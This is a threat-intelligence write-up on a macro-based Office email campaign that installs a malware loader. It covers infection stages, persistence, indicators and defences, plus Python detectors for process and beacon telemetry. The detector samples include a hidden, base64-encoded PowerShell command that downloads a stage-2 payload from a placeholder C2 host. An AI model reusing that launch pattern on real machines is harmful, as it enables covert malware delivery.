One Click Is Enough: Commodity Loader Emails Quietly Opening the Door to Full System Takeovers

Executive Summary

A large-scale malicious email campaign, now commonly referred to as the Commodity Loader Campaign, has been actively targeting organizations across multiple industries using weaponized Office documents as the initial infection vector. The campaign was publicly reported in early January 2026 and remains active.

The attack does not rely on exploiting software vulnerabilities. Instead, it abuses trusted business file formats, user interaction, and built-in Windows tools to quietly deploy a malware loader that acts as a gateway for additional payloads, including remote access trojans and credential-stealing malware.

What makes this campaign particularly dangerous is its simplicity, reliability, and flexibility. The loader itself is not the end goal. It exists solely to give attackers persistent access and the ability to deploy whatever malware best suits their objective.


What Happened

Organizations began reporting suspicious activity originating from email attachments that appeared to be normal business documents. Employees received emails containing invoices, shipping documents, payment confirmations, or internal-looking reports.

Once opened, the document displayed a familiar message prompting the user to “Enable Editing” or “Enable Content” to view the file correctly. After the user complied, malicious code embedded inside the document executed silently in the background.

Within seconds, the infected system established outbound communication with attacker-controlled infrastructure and downloaded the Commodity Loader payload. From there, the attackers were able to deploy additional malware, steal credentials, and maintain access without immediately alerting defenders.


Initial Attack Vector

Primary Vector:
Malicious email attachments

Common Attachment Types Observed:

  • .docm (macro-enabled Word documents)
  • .xlsm (macro-enabled Excel spreadsheets)
  • .docx files containing embedded scripts
  • .zip archives containing weaponized Office files
  • .html or .htm files masquerading as documents

Email Characteristics:

  • Sent from compromised or spoofed business accounts
  • Often contain few, if any, spelling or grammar errors
  • Designed to look routine and non-urgent
  • Frequently reference real-world business processes

Infection Chain

Stage 1 – Document Execution

When the document is opened:

  • A macro or embedded script checks whether macros are enabled
  • If disabled, the user is prompted to enable them
  • Once enabled, the malicious script runs automatically

Stage 2 – Script Execution

The macro launches:

  • PowerShell
  • Windows Script Host (wscript.exe or cscript.exe)
  • mshta.exe in some cases

The script is usually obfuscated and Base64-encoded to avoid detection.

Stage 3 – Loader Deployment

The script:

  • Downloads or reconstructs the Commodity Loader in memory
  • Writes minimal or no files to disk
  • Establishes persistence mechanisms

Stage 4 – Command and Control Communication

The loader:

  • Contacts attacker-controlled servers over HTTP or HTTPS
  • Uses encrypted or encoded traffic
  • Waits for instructions or additional payloads

Commodity Loader – Technical Overview

Commodity Loader is a lightweight malware framework shared among multiple threat groups. It is not tied to a single criminal operation.

Key Capabilities:

  • In-memory execution
  • Payload delivery and execution
  • Environment profiling
  • Persistence installation
  • Encrypted C2 communications
  • Anti-analysis checks

The loader is modular, meaning attackers can swap payloads without changing the initial delivery method.


Payloads Delivered

1. Remote Access Trojans (RATs)

Used to:

  • Remotely control infected systems
  • Execute arbitrary commands
  • Capture screenshots
  • Log keystrokes
  • Upload and download files

2. Information Stealers

Designed to extract:

  • Browser credentials
  • Saved passwords
  • Authentication cookies
  • Email account data
  • VPN credentials
  • Cryptocurrency wallet data

3. Secondary Loaders

Used to:

  • Maintain long-term access
  • Deliver updated malware
  • Pivot to additional systems

No confirmed ransomware deployment has been observed in this campaign so far, but the loader architecture could support it.


Persistence Mechanisms Observed

  • Registry Run keys:
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • Scheduled tasks with random or system-like names
  • Startup folder shortcuts
  • DLL side-loading in user-writable directories

Indicators of Compromise (IOCs)

File System Indicators

  • Office documents with unexpected macros
  • Newly created files in:
    • %AppData%\ (which already resolves to AppData\Roaming)
    • %LocalAppData%\
    • %Temp%\
  • Files with random or system-like names such as:
    • update32.dll
    • winservice.exe
    • syscache.tmp

Process Indicators

  • WINWORD.EXE or EXCEL.EXE spawning:
    • powershell.exe
    • cmd.exe
    • wscript.exe
    • mshta.exe
  • PowerShell launched with:
    • -EncodedCommand
    • Hidden window flags

Network Indicators

  • Outbound traffic to:
    • Recently registered domains
    • Domains with no business relevance
  • Repeated beaconing every few minutes
  • Encrypted HTTP POST requests with small payload sizes

Behavioral Indicators

  • Office applications initiating network connections
  • Scheduled tasks created shortly after document execution
  • Unusual PowerShell execution from user context

How This Attack Can Be Identified

Email-Level Detection

  • Macro-enabled documents sent from external senders
  • HTML attachments disguised as invoices
  • ZIP files containing a single Office document

Endpoint Detection

  • Alert on Office spawning scripting engines
  • Monitor PowerShell with encoded commands
  • Detect suspicious scheduled task creation
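An added example, not code from the original post, of the endpoint checks described in the Process Indicators and Endpoint Detection sections: Python run over constructed Sysmon-style process-creation records that flags an Office parent spawning a scripting engine, PowerShell hidden-window and -EncodedCommand switches, and decodes the encoded command so an analyst can triage it. The image paths, the stage-2 command line and the user and file names are constructed stand-ins.

```python
import base64
import re
from pathlib import PureWindowsPath

OFFICE_PARENTS = {"winword.exe", "excel.exe"}
SCRIPT_ENGINES = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# powershell.exe accepts any unambiguous prefix of a switch, so -e, -ec, -enc ... all mean -EncodedCommand
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
HIDDEN_FLAG = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+(?:hidden|1)\b")

def decode_encoded_command(blob):
    """-EncodedCommand carries base64 of UTF-16LE text; return None if it does not decode."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None

def analyse_event(event):
    findings = []  # indicator names that fire for one process-creation record
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    child = PureWindowsPath(event["Image"]).name.lower()
    cmd = event.get("CommandLine", "")
    if parent in OFFICE_PARENTS and child in SCRIPT_ENGINES:
        findings.append(f"office_spawns_script_engine:{parent}->{child}")
    if child == "powershell.exe":
        if HIDDEN_FLAG.search(cmd):
            findings.append("powershell_hidden_window")
        m = ENCODED_FLAG.search(cmd)
        if m:
            findings.append("powershell_encoded_command")
            decoded = decode_encoded_command(m.group(1))
            if decoded is not None:  # surface the plaintext so the analyst sees what stage 2 does
                findings.append("decoded:" + decoded)
    return findings

# Constructed Sysmon-style (Event ID 1) records, not real telemetry; the stage-2 command is a stand-in
SAMPLE_PS = r"Invoke-WebRequest -Uri http://c2.example.invalid/stage2 -OutFile $env:TEMP\syscache.tmp"
SAMPLE_B64 = base64.b64encode(SAMPLE_PS.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {SAMPLE_B64}"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe //B C:\Users\jdoe\AppData\Local\Temp\invoice.js"},
    {"ParentImage": r"C:\Windows\explorer.exe",  # benign admin script: must not fire
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]
```

The -ExecutionPolicy case is kept deliberately: a rule that keys on any "-e" prefix without requiring a base64 argument would fire on routine admin scripts.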

Network Detection

  • Look for low-volume, high-frequency outbound connections
  • Identify traffic to newly registered domains
  • Monitor unusual HTTPS traffic from user workstations
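An added example, not from the original post, of the Network Indicators and Network Detection checks: Python over a constructed proxy log that scores each source/destination pair for a tight beaconing period, small POST bodies and a recently registered domain. The log lines, hosts and registration dates are constructed, and the REGISTERED table stands in for a real WHOIS or passive-DNS lookup.

```python
import statistics
from collections import defaultdict
from datetime import date, datetime

# Constructed proxy log, not real telemetry: "<ISO timestamp> <src_ip> <host> <method> <bytes_out>"
SAMPLE_LOG = """\
2026-01-14T09:00:00 10.0.0.15 update-sync-docs.example POST 312
2026-01-14T09:05:02 10.0.0.15 update-sync-docs.example POST 298
2026-01-14T09:10:01 10.0.0.15 update-sync-docs.example POST 305
2026-01-14T09:15:03 10.0.0.15 update-sync-docs.example POST 301
2026-01-14T09:19:59 10.0.0.15 update-sync-docs.example POST 299
2026-01-14T09:25:01 10.0.0.15 update-sync-docs.example POST 310
2026-01-14T09:00:00 10.0.0.22 mail.corp-intranet.example GET 4100
2026-01-14T09:00:40 10.0.0.22 mail.corp-intranet.example POST 52000
2026-01-14T09:07:00 10.0.0.22 mail.corp-intranet.example GET 900
2026-01-14T09:30:00 10.0.0.22 mail.corp-intranet.example POST 18000
"""
# Stand-in for a WHOIS / passive-DNS registration-date lookup; both dates are constructed
REGISTERED = {"update-sync-docs.example": date(2026, 1, 5), "corp-intranet.example": date(2014, 3, 2)}
TODAY = date(2026, 1, 14)

def parse(log):
    recs = []
    for line in log.splitlines():
        ts, src, host, method, size = line.split()
        recs.append({"ts": datetime.fromisoformat(ts), "src": src, "host": host,
                     "method": method, "bytes": int(size)})
    return recs

def find_beacons(recs, today=TODAY, min_hits=4, max_cv=0.2, max_post_bytes=1024, new_domain_days=30):
    by_pair = defaultdict(list)  # flag (src, host) pairs with many evenly spaced, small requests
    for r in recs:
        by_pair[(r["src"], r["host"])].append(r)
    hits = []
    for (src, host), rs in by_pair.items():
        if len(rs) < max(min_hits, 2):
            continue
        rs.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(rs, rs[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")  # jitter relative to the period
        if cv > max_cv:  # human-driven traffic is bursty; a beacon keeps a tight period
            continue
        small_posts = sum(r["method"] == "POST" and r["bytes"] <= max_post_bytes for r in rs)
        reg = REGISTERED.get(".".join(host.split(".")[-2:]))  # naive registrable-domain cut
        hits.append({"src": src, "host": host, "hits": len(rs), "period_s": round(mean),
                     "jitter": round(cv, 3), "small_posts": small_posts,
                     "newly_registered": reg is not None and (today - reg).days <= new_domain_days})
    return hits
```

The mail-server pair has as many requests as the beacon but irregular gaps and large bodies, so it is dropped on jitter alone; in production the thresholds should be tuned against a baseline of the workstation's normal traffic.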

User Behavior Signals

  • Reports of documents requesting macro enablement
  • Systems slowing down shortly after opening documents
  • Unexpected credential lockouts or account misuse

Impacted Industries

The campaign has impacted a wide range of industries, including:

  • Manufacturing
  • Logistics and transportation
  • Financial services
  • Healthcare
  • Retail
  • Professional services
  • Small and medium-sized businesses

No specific organization size or geography appears to be exclusively targeted.


Why This Campaign Is Effective

  • Relies on user trust, not software flaws
  • Uses legitimate Windows tools
  • Avoids dropping obvious malware files
  • Easily adaptable for different payloads
  • Difficult to block without behavioral controls

Defensive Recommendations

  • Disable Office macros by default
  • Block Office apps from launching PowerShell
  • Enforce application control policies
  • Strengthen email attachment filtering
  • Monitor PowerShell and script activity
  • Conduct regular phishing awareness training

Final Takeaway

The Commodity Loader campaign is a reminder that modern cyber threats do not always rely on advanced exploits. Instead, attackers succeed by blending into normal business activity and abusing tools that organizations already trust.

Until organizations fully address macro abuse, script monitoring, and user behavior risks, campaigns like this will continue to be effective.


Aegiron